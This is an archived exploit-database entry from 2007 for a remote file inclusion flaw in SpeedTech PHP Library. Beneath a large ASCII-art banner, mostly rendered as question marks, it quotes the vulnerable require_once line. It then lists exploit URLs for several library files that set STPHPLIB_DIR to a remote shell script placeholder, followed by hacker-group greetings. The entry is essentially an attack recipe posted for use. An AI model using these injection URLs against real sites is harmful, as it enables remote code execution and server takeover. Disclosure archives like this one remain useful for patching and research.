STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion
Author: leetsecurity
type: webapps
platform: php
port:
date_added: 2007-09-02
date_updated: 2016-10-12
verified: 1
codes: OSVDB-39105;CVE-2007-4738;OSVDB-39104;OSVDB-39103;OSVDB-39102;CVE-2007-4737;OSVDB-39101;OSVDB-39099;OSVDB-39098;OSVDB-39097;OSVDB-39096;OSVDB-39095;OSVDB-39093;OSVDB-39092;OSVDB-39091;OSVDB-39090;OSVDB-39087;OSVDB-39086;OSVDB-39085;OSVDB-39083;OSVDB-39082;OSVDB-39080;OSVDB-39079;OSVDB-39076;OSVDB-39075;OSVDB-39074;OSVDB-39073;OSVDB-38931;OSVDB-38930;OSVDB-38929
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comstphplib_0.8.0_hammer.tgz
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
# SpeedTech PHP Library <= Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##############################################################################################
#ERROR1:stphpapplication.php
#require_once("$STPHPLIB_DIR/stphpobject.php");<<< rfi coded.
#
#Other Files:
# stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
# stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
# stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]
# ........................................
# ........................................
# ........................................
##############################################################################################
#
#http://php.html.it/script/vedi/1872/stphplibrary/
#
##############################################################################################
#
#LEETSECURITY.ORG <<<< sanal alemde bizde varýz...
############################################################################################
#coded by ..Wocker..
#
#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################
##############################################################################################
##############################################################################################
# milw0rm.com [2007-09-03]